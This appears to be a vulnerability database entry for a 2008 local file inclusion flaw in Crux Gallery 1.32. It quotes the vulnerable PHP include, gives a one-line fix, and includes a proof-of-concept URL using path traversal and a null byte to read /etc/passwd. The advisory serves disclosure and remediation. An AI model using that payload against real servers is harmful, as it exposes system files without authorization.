Lucene search
K

Crux Gallery <= 1.32 (index.php theme) Local File Inclusion Vulnerability

🗓️ 02 Oct 2008 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 17 Views

Crux Gallery <= 1.32 Local File Inclusion Vulnerability discovered on 01/10/2008. PHP.ini settings: Magic_Quotes_Gpc = Off. Vulnerable code in index.php allows inclusion of any file

Code

                                                 ~~+=========================================================+~~
 ~~+=========================================================+~~
  [?] Crux Gallery &lt;= 1.32 Local File Inclusion Vulnerability
  [?] Discovered On: 01/10/2008
  [*] PHP.ini 
  [*] Magic_Quotes_Gpc = Off
 ~~+=========================================================+~~
  (index.php) // Greetz -&gt; Osirys and darkjoker
  14. $m = $_GET['m'];
  15. $p = $_GET['p'];
  16. $dir = $_GET['dir'];
  17. require_once(&quot;main.php&quot;);
  18. require_once(&quot;themes/&quot;.$theme.&quot;/theme.php&quot;); 
  $theme  isn't declared, so you can include any file.
  [*] http//[path]/index.php?theme=../../../../../etc/passwd%00
  [*] How To Fix: declare $theme
  ~~+=========================================================+~~

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2008 00:00Current
7.1High risk
Vulners AI Score7.1
17